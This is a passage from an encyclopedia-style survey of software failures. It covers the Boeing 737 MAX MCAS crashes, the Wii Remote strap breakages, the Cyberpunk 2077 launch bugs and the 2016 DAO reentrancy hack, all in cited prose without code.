the U.S. Department of Justice, admitting to misleading regulators on mechanical defect severity but denying electronic causation; critics, including some automotive safety researchers, argue the settlements and code critiques indicate underreported software risks, though federal probes found no causal link to widespread incidents.[91][92]Boeing 737 MAX MCAS Software Issue (2018-2019)
The Maneuvering Characteristics Augmentation System (MCAS) in the Boeing 737 MAX was a software-driven flight control feature designed to automatically adjust the horizontal stabilizer trim in response to angle-of-attack (AoA) sensor data, compensating for the aircraft's increased pitch-up tendency caused by larger, forward-mounted engines compared to prior 737 variants.[93] MCAS activated during high AoA conditions to apply nose-down trim, but its logic processed input from only one of two available AoA sensors without cross-checking for discrepancies, allowing a single faulty sensor reading to trigger erroneous commands.[94] This design choice, intended to simplify certification by avoiding pilot retraining on the 737 NG flight envelope, lacked safeguards against persistent activation; once triggered, MCAS could re-engage multiple times per flight even after pilot override attempts, as the stabilizer trim motors were powerful enough to overcome manual counter-efforts under certain aerodynamic loads.[95] Boeing's system safety assessments underestimated the risk of uncommanded MCAS operation, rating it as "catastrophic" but assuming pilots would recognize and counteract it using existing runaway trim procedures, without disclosing MCAS's repeated activation potential or full reliance on a single sensor.[96] The flaw manifested in Lion Air Flight 610 on October 29, 2018, when the Boeing 737 MAX 8 (PK-LQP) crashed into the Java Sea 13 minutes after takeoff from Jakarta, Indonesia, killing all 189 aboard; a damaged AoA sensor provided erroneous high-reading input, causing MCAS to command repeated nose-down trim that pilots partially countered but ultimately could not fully overcome amid competing stick shaker warnings and unreliable airspeed indications.[97] The aircraft's prior flight had experienced similar MCAS activations due to the same sensor issue, which maintenance failed to fully diagnose despite partial troubleshooting.[98] Indonesia's National Transportation Safety Committee final report identified the faulty AoA sensor and MCAS as contributing factors in a chain including maintenance errors, weight/misrigging discrepancies, and pilot responses, but emphasized the system's design vulnerability to single-point failures without adequate pilot awareness or cockpit indications for MCAS-specific faults.[97][99] A similar sequence unfolded in Ethiopian Airlines Flight 302 on March 10, 2019, with the 737 MAX 8 (ET-AVJ) crashing six minutes after departing Addis Ababa, Ethiopia, killing all 157 occupants; erroneous AoA data again prompted MCAS to apply unrelenting nose-down trim, which the crew attempted to neutralize using electric trim switches and the cutoff switches, but the system's re-activations during manual flight overwhelmed their efforts despite following Boeing's recommended procedures.[100] Ethiopia's Aircraft Accident Investigation Bureau preliminary findings highlighted flawed sensor data triggering MCAS as a central element, while the final report noted production-related sensor anomalies but maintained that MCAS's response exacerbated the loss of control.[101] The U.S. National Transportation Safety Board critiqued aspects of the Ethiopian analysis for underemphasizing sensor production quality issues but concurred that MCAS design assumptions about pilot intervention were inadequate given the lack of training or documentation on its multi-cycle behavior.[102] These incidents exposed broader certification shortcomings, as the Federal Aviation Administration had delegated significant oversight to Boeing under its Organization Designation Authorization program, leading to incomplete MCAS risk disclosures and flawed hazard analyses that did not fully model single-sensor failure scenarios.[96] A U.S. House investigation revealed Boeing engineers had identified but downplayed MCAS dependencies during development, prioritizing cost and schedule to match Airbus A320neo competition, resulting in software that treated AoA discrepancies as valid rather than anomalous.[103] Global regulators grounded the 737 MAX fleet starting March 11-13, 2019, affecting over 380 aircraft; Boeing's remedial software update, certified in late 2020, incorporated dual AoA sensor inputs with disagreement logic, rate limiting on trim commands, and revised pilot alerts, enabling return to service after 20 months.[94] The episode underscored risks in automating critical flight controls without robust failure-mode redundancies, with post-accident data indicating MCAS's original implementation violated first-order engineering principles by amplifying hardware faults into systemic instability.[93][95]Media and Gaming
Nintendo Wii Remote Strap Failure (2006, software interaction)
The Nintendo Wii Remote wrist strap failures emerged as a prominent issue following the console's launch on November 19, 2006, primarily during gameplay involving motion controls that required users to swing the controller vigorously, such as in the bundled Wii Sports title simulating tennis, bowling, and boxing.[104] The strap, a nylon cord designed to secure the battery-powered Remote to the user's wrist, frequently snapped under the tension of these physical gestures, causing the device to detach and strike nearby objects like televisions, walls, or furniture.[105] Incidents were exacerbated by the software's reliance on full-body mimicry of real-world actions to register inputs via the Remote's embedded accelerometer, which detected orientation and acceleration but imposed no algorithmic limits on swing velocity or force to prevent hardware stress.[104] This interaction between the motion-sensing software mechanics—intended to deliver intuitive, immersive control—and the strap's material limitations turned routine play into a risk factor, with users following on-screen prompts for exaggerated motions without built-in safeguards like dynamic sensitivity scaling or haptic feedback thresholds to mitigate overexertion.[106] By early December 2006, Nintendo had received over 100 reports of strap breakages in the United States alone, including instances of property damage estimated in the thousands of dollars per case and three minor injuries not requiring medical treatment, all linked to Wii Sports sessions.[104] The company's investigation attributed failures to cords fraying or tearing when subjected to "excessive force" during swings, a scenario directly prompted by software-driven gameplay loops that rewarded amplitude in motion for accurate input registration.[105] On December 15, 2006, Nintendo announced a voluntary replacement program for the original straps bundled with approximately 3.2 million Wii Remotes sold worldwide up to that point, shipping thicker, more durable versions at no cost to owners; the initiative stemmed from consumer complaints and preemptive measures to avoid broader liability, though Nintendo denied it constituted a formal recall.[107] Class-action lawsuits followed, alleging defective design and inadequate warnings, with plaintiffs claiming the Remote's software encouraged behaviors that foreseeably overwhelmed the hardware, such as rapid, full-arm extensions without velocity caps in the input processing algorithms.[108] In response, Nintendo issued usage guidelines emphasizing proper strap attachment and moderate swinging, later incorporating on-screen safety prompts in some titles to remind players of risks, though no firmware updates altered core motion detection logic to enforce safer interaction parameters.[109] The episode highlighted a systems-level oversight where software innovation prioritizing accessibility and physical engagement outpaced hardware robustness testing under simulated peak loads, resulting in widespread failures despite the Remote's otherwise reliable Bluetooth-based pointing and acceleration tracking.[110] Despite the disruptions, Wii sales remained strong, with the strap program costing Nintendo around $1 million but underscoring the trade-offs in early motion-control paradigms that lacked integrated error-handling for peripheral strain.[110]Cyberpunk 2077 Launch Bugs (2020)
Cyberpunk 2077, developed by CD Projekt Red, launched on December 10, 2020, for Microsoft Windows, PlayStation 4, PlayStation 5, Xbox One, Xbox Series X/S, and Stadia, following multiple delays from its original 2019 target.[111] The release encountered widespread software bugs, including frequent crashes, clipping through environments, non-functional non-player character (NPC) behaviors, erratic driving physics, and quest progression failures, which compromised core gameplay mechanics across platforms.[112] These issues stemmed from incomplete implementation of promised features, such as dynamic crowd systems and vehicle combat, due to unfinalized underlying code and insufficient testing on console hardware.[112] Performance degradation was most acute on base PlayStation 4 and Xbox One consoles, where frame rates often dropped below 20 FPS, accompanied by severe texture pop-in, reduced draw distances rendering foliage and buildings invisible, and rendering errors making characters or vehicles disappear mid-interaction.[113] Internal developer reports indicated awareness of these optimization shortfalls prior to launch, with staff doubting the game's readiness for 2020 release amid pressure to meet financial milestones, yet proceeding without adequate console-specific refinements.[114] On December 17, 2020, Sony Interactive Entertainment removed the game from the PlayStation Store and initiated full refunds for all digital purchases, citing unacceptable bug levels and performance, marking an unprecedented action against a major title.[115] CD Projekt Red responded with public apologies and a series of hotfixes starting December 2020, addressing crashes and stability, followed by major patches like 1.1 in February 2021 that improved console framerates and reduced load times, though full remediation required over a year of updates.[116] Despite the fallout, the game achieved 13.7 million units sold by year-end 2020, generating over $560 million in revenue, with CD Projekt's direct refund program processing approximately 30,000 requests at a cost of $2.23 million, though platform-specific refunds like Sony's added undisclosed volumes.[117] The launch bugs triggered class-action lawsuits alleging misleading marketing of console versions and contributed to a sharp decline in CD Projekt's share price, dropping over 30% in December 2020, underscoring failures in quality assurance processes for cross-platform development.[118] Subsequent patches, including the 2.0 overhaul in 2023, largely resolved persistent issues, enabling the game's return to the PlayStation Store in June 2021 after performance benchmarks met Sony's criteria.[112]Blockchain and Cryptocurrency
DAO Hack (2016)
The DAO (Decentralized Autonomous Organization) was a venture capital fund implemented as a set of Ethereum smart contracts, designed to allow token holders to collectively fund and govern projects without centralized management. It raised approximately 12 million ETH—valued at around $150 million USD—through an initial coin offering that concluded on May 31, 2016, marking one of the largest crowdfunding efforts in cryptocurrency history at the time.[119][120] On June 17, 2016, an attacker exploited a software vulnerability in The DAO's smart contract code, siphoning 3.6 million ETH (about one-third of the total funds), equivalent to roughly $50 million USD based on contemporaneous Ether prices.[121][122] The bug involved a reentrancy flaw in thesplitDAO function, which permitted the creation of "child DAOs" to withdraw investor shares; the contract transferred ETH to the caller's address before updating its internal balance tracking, allowing recursive calls that drained funds multiple times before the state change took effect.[122] This vulnerability arose from inadequate safeguards against recursive external calls in Solidity, the Ethereum programming language, despite prior warnings from security researchers about similar risks in the codebase.[123]
The exploit unfolded over multiple transactions starting at Ethereum block 1,621,370, with the attacker methodically withdrawing funds into a child DAO under their control, which remained locked until a 28-day delay period due to The DAO's governance rules.[122] Ethereum developers paused contract creation temporarily to analyze the issue, confirming the reentrancy as the root cause rather than a consensus-layer flaw.[124]
To recover the funds, Ethereum's core developers proposed and executed a hard fork on July 20, 2016, at block 1,920,000, which retroactively moved the stolen ETH to a refund contract accessible by original token holders.[125] A minority faction rejected the fork, citing blockchain immutability principles, resulting in a chain split: the forked chain became Ethereum (ETH), while the unaltered original evolved into Ethereum Classic (ETC).[124][119] The event exposed systemic risks in deploying unproven, unaudited smart contracts at scale, influencing subsequent industry standards for formal verification, multi-signature wallets, and reentrancy guards like the checks-effects-interactions pattern.[122] No funds were ultimately lost to the attacker on the dominant Ethereum chain, but the hack underscored causal links between hasty code deployment and catastrophic financial losses in permissionless systems.
